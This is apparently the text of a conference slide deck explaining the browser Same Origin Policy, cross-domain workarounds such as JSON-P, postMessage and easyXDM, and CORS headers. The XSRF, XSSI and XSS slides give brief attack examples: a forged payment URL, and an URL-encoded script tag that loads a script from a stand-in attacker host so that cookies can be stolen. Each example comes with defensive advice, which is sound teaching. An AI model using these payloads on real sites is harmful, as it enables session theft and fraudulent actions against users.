var title = “Go Beyond Cross Domain Boundaries”;$(this).attr(“title”, title);

$(this).data({

font: ‘Segoe UI’,

size: ‘30pt’,

speaker: ‘Ivelin Andreev’

});

About me

• Project Manager @

• 11 years professional experience

• MCPD .NET Web Development

• ivelin.andreev@icb.bg

• http://www.linkedin.com/in/ivelin

• Business Interests

o Web Development (ASP.NET, jQuery, AJAX)

o SOA, Integration

o GIS, Mapping

o Performance tuning, Network security

Agenda

• What is Same Origin Policy

• Security issues it solves

• Security issues it does not solve

• X-domain techniques

• CORS

• Why CORS?

• Demo

The Same Origin Policy (SOP)

• Same origin - if scheme://host:port are the same

• JavaScript limited by SOP

• Script access properties of documents with same origino DOM objects

o Cookies

Same origin policy is the most important security

concept in modern browsers

https://lh4.googleusercontent.com/-o9vXTXNxnYc/TY3u5UpV-UI/AAAAAAAAXiM/gvMHSRbhGWU/s1600/1600constitution.jpg

Same Origin Policy as Concept

• Not a single policy but set of mechanismso SOP for DOM access

o SOP for XMLHttpRequest

o SOP for Cookies

o SOP for Flash

o SOP for Java

o SOP for Silverlight

• Significant bottleneck in browsers

• Behavior is different among browsers

• Static bound to single domaino Not all content on site should be trusted the same

Change origin is possible (with some limitations)

http://nutshelltek.com/wp-content/uploads/2013/05/Security.jpg

Changing Origin

• document.domaino Allow subdomain to access parent domain

o Must set to the same value for parent domain and subdomain

• Port number set to null

• Even in document.domain = document.domain

• Cross-origin network accesso X-Origin Writes – Typically Allowed (redirects, form submissions)

o X-Origin Embed – Typically Allowed

• JavaScript <script src="..."></script>

• CSS <link rel="stylesheet" href="...">

• Frames <frame>, <iframe>

• Media & Plugins <img>, <video>, <audio>, <object>, <embed>

o X-Origin Reads – Typically Not allowed

Same-Origin Policy Limits

• http://evilHacker.como <a>

• Can link to resource in another domain

• But cannot control site from another domain

o <iframe>

• Include resource from another domain

• But cannot directly access DOM

o <script>

• Include script from another domain

• But cannot act on behalf of the script

• Implement policy check and inspect contents of enclosing page

o <form method=“POST” name=“f1” action=“http://company.com/page.aspx”>

• Submit forms without user input

• But cannot access user cookies

Cross domain policy does NOT prevent web

application exploits

• Impacto EvilHacker.com cannot read DOM but can POST to app

o User access is blocked or stolen

o Act on behalf of the user (payment)

• Preventiono Identify valid requests

• By user provided secret (low usability)

• By XSRF token for every request

Cross Site Request Forgery (XSRF)

• Caseo User logs in http://goodSite.com as usual

o http://evilHacker.com can

• POST new password in form to GoodSite.com

• GET http://goodSite.com/Payment.aspx?amount=1000&userID=EvilHacker

o Authenticated because cookies are sent

Cross Site Scripting Inclusion (XSSI)

• Caseo http://goodSite.com includes <script> to perform AJAX request

o http://evilHacker.com includes the same script

o Authenticated because cookies are sent

o JSONP (SCRIPT + JSON) returned by server as usual

o SCRIPT evaluated in EvilHacker.com context and JSON is stolen

o EvilHacker.com redefines callback

• Impacto User data are stolen

• Preventiono http://goodSite.com must check policy of script inclusion

Cross Site Scripting (XSS)

• Caseo http://evilHacker.com injects <script> in http://goodSite.com application context

• By posting HTML form field

• By tricking user to click link with query parameters sent by mail

o %3Cscript%20src%3D%27evilHacker.com%2Fscript.js%27%3E

• Impacto Steel user cookies for GoodSite.com and transfer to EvilHacker.com

o Phishing attack redirects to GoodSite.com copy

o Script modify GoodSite.com content (even SSL cert will not warn)

• Preventiono Filter user input

o ALWAYS HTML and URL Encode/Decode

o Do not send untrusted data to browser

There is need of reliable and secure

Cross Domain Messaging

http://leadership-standard.blogspot.com/2012/08/the-message-you-dont-need.html

Common X-Domain Use Cases

Typical cases

• Consume REST APIs

• Build mashups

• Operate Ads

• Synchronize two pages

Use when

• You own both sites

• Request information from a site that trusts you

Note

• No solution solves the problems in every browser.

Policy limitations forced developers create

ingenious workarounds

window.name Hack

• Child window (frame/iframe) sets:

window.name = ‘{“message”:”text”}’;

• Parent window:

f = document.createElement('iframe');

f.onload = function () { doWork(); f.src='about:blank'};

f.src = 'http://otherDomain.com';

document.body.appendChild(f);

Notes:

• Very tricky, works on all browsers

document.domain Hack

• Allows cross SUB-domain access//From a page in http://sub.masterDomain.com

document.domain = “masterDomain.com”;

• Pages can access each other’s DOM objects

• The sub- and parent domain have the same permissions

Notes:

• document.domain is ReadOnly property in HTML spec.

• Useful when you do not own both sites

• Works on all browsers

• Port set to null when document.domain is set

iFrame Proxy Hack

• domainB tries to get parent.documento Permission denied to access property ‘document’’

• Hidden iFrame to exchange data

• Proxy: subscribes to onResize event

• Child: domainB sets hash on proxy domainA.com#msg

• Proxy: reads message and changes window.top

Notes:

• Do-it-yourself approach

• Complex and browser-dependent

• Widely accepted as standard

http://designtaxi.com/userfiles/articles/101845/thumb/banner.png

Other solutions are not that hacky

What is new in HTML5

window.postMessage

Pass message between two windows safely

otherWindow.postMessage(message, targetOrigin, [FF:transfer]);

• otherWindow can listen for sent messages by executing:

function receiveMessage(event) {

if (event.origin !== "http://example.org") return; ... }

window.addEventListener("message", receiveMessage, false);

Notes:

• Basic support in IE8, IE9, limitations in IE10

• Always check origin to prevent XSS attacks

• If you do not expect messages, do not subscribe

JSON-P

• Loads JSON from another domain

• Exploits HTML <script> element exception to SOP

• Client adds query parameters to server<script type="application/javascript" src="http://otherDomain.com/Svc/Get?callback=parseResponse" />

• Server returns JSON wrapped in function callparseResponse ({“this”:”is”,”json”:”data”});

• JS function callback evaluated in page

Notes:

• Useful for RESTful APIs

• Vulnerable to XSRF and XSS attacks

easyXDM Library

• Pass string messages between domainso Enables developers to workaround SOP limitations

o postMessage transport on modern browsers, fallback to frame element

• Consumer

var socket = new easyXDM.Socket({

remote: “http://domain.com/provider/”, //provider path

onMessage: function(message, origin){

if (origin==“…”) alert(message); } });

socket.postMessage(“message");

• Provider

var socket = new easyXDM.Socket({

onMessage: function(message, origin) {alert(message); } });

Cross Origin Resource Sharing

http://onlypositive.net/image.axd?picture=2010%2F6%2Fsharing-ice-cream-cone-girl-dog.jpg

How does CORS Work

• Request headerso Origin: http://myDomain.com

• Response headerso Access-Control-Allow-Origin:

• http://myDomain.com

• “*” – all domains allowed

o Error if not allowed

Note: “*” does not allow supply of credentialso HTTP authentication will not work

o Client SSL certificates will not work

o Cookies will not work

Preflight Request

• Required wheno HTTP verb other than GET/POST

o Request MIME type other than text/plain (i.e. application/json)

o Custom headers

• Headers determine whether CORS is enabledo Request (HTTP OPTIONS method)

• Origin: http://myDomain.com

• Access-Control-Request-Method: [method the request wants to use]

• Access-Control-Request-Headers: [optional CSV, custom headers]

o Response

• Access-Control-Allow-Origin: [allowed origin]

• Access-Control-Allow-Methods: [CSV allowed methods]

• Access-Control-Allow-Headers: [CSV allowed headers]

• Access-Control-Max-Age: [seconds preflight is valid]

Credential Request

• By Defaulto X-domain do not send credentials (cookies, client SSL, HTTP authentication)

• Request (specify send credentials)o xmlHttpRequest.withCredentials = true;

• Response headers (if server allows )o Access-Control-Allow-Credentials: true

o Access-Control-Allow-Origin: http://myDomain.com

o Otherwise response will be ignored by browser

o Header can be sent during pre-flight request

Can I Use

http://caniuse.com/cors

IE 8 and IE9 limitations• Use XDomainRequest

• Preflight not supported

• Request limited to the target scheme of hosting page

Why use CORS

• The most robust solution for X-domain requests with JS

• The best approach to consume RESTful API with JS

• Modern alternative to JSON-P and W3C standard

JSON-P CORS

HTTP Verbs GET GET,PUT,POST,DELETE,OPTIONS

Browser Support All Does not < IE 8

Error Handling Tricky to none HTTP status access via XHR

Performance 1 HTTP Request 2 Requests (up to 3)

Authentication Cookies only Cookies, Basic, client SSL

X-Site Scripting If external site compromised Consumer parses response

Check this out

• Open Web Application Security Projecto https://www.owasp.org/

• Mozilla Developer Networko http://developer.mozilla.org

• Html5rocks CORS Tutorialo http://www.html5rocks.com/en/tutorials/cors/

• Gruyere Code Lab - Exploits and Defenseso http://google-gruyere.appspot.com/

Demo

DEMO

Thanks to our Sponsors:

Diamond Sponsor:

Gold Sponsors:

Swag Sponsors: Media Partners:

Technological Partners:

Silver Sponsors:

Bronze Partners: